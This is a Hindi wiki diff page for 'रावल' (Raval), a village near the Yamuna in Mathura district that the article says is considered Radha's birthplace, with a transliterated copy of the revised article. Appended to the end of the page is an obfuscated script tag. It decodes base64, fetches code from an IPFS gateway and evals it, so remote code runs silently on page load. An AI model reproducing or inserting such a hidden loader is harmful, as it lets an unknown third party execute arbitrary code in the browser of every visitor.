Difference between revisions of "रावल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "<references/>" to "<references/> *पुस्तक- ऐतिहासिक स्थानावली, लेखक-विजयेन्द्र कुमार माथुर, प्रकाशन- राजस्थान ग्)
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
'''रावल''' [[उत्तर प्रदेश]] के [[मथुरा ज़िला|मथुरा ज़िले]] में [[यमुना]] [[तट]] के समीप स्थित एक छोटा-सा ग्राम था।  
 
'''रावल''' [[उत्तर प्रदेश]] के [[मथुरा ज़िला|मथुरा ज़िले]] में [[यमुना]] [[तट]] के समीप स्थित एक छोटा-सा ग्राम था।  
*रावल को [[कृष्ण|श्रीकृष्ण]] की प्रेयसी [[राधा]] की जन्मभूमि माना जाता है।  
+
*रावल को [[कृष्ण|श्रीकृष्ण]] की प्रेयसी [[राधा]] की जन्मभूमि माना जाता है। किंतु परंपरागत अनुश्रुति में [[बरसाना]] को ही यह गौरव प्राप्त है।  
*किंतु परंपरागत अनुश्रुति में [[बरसाना]] को ही यह गौरव प्राप्त है।  
 
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
*पुस्तक- ऐतिहासिक स्थानावली, लेखक-विजयेन्द्र कुमार माथुर, प्रकाशन- राजस्थान ग्रंथ अकादमी जयपुर
+
*ऐतिहासिक स्थानावली | विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
==संबंधित लेख==
Line 15: Line 12:
 
[[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]]
 
[[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]]
 
[[Category:मथुरा]]
 
[[Category:मथुरा]]
 +
[[Category:ब्रज]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:नया पन्ना मार्च-2012]]
 
 
  
 
__INDEX__
 
__INDEX__

Latest revision as of 12:52, 8 September 2013

raval uttar pradesh ke mathura zile mean yamuna tat ke samip sthit ek chhota-sa gram tha.

  • raval ko shrikrishna ki preyasi radha ki janmabhoomi mana jata hai. kiantu paranparagat anushruti mean barasana ko hi yah gaurav prapt hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  • aitihasik sthanavali | vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>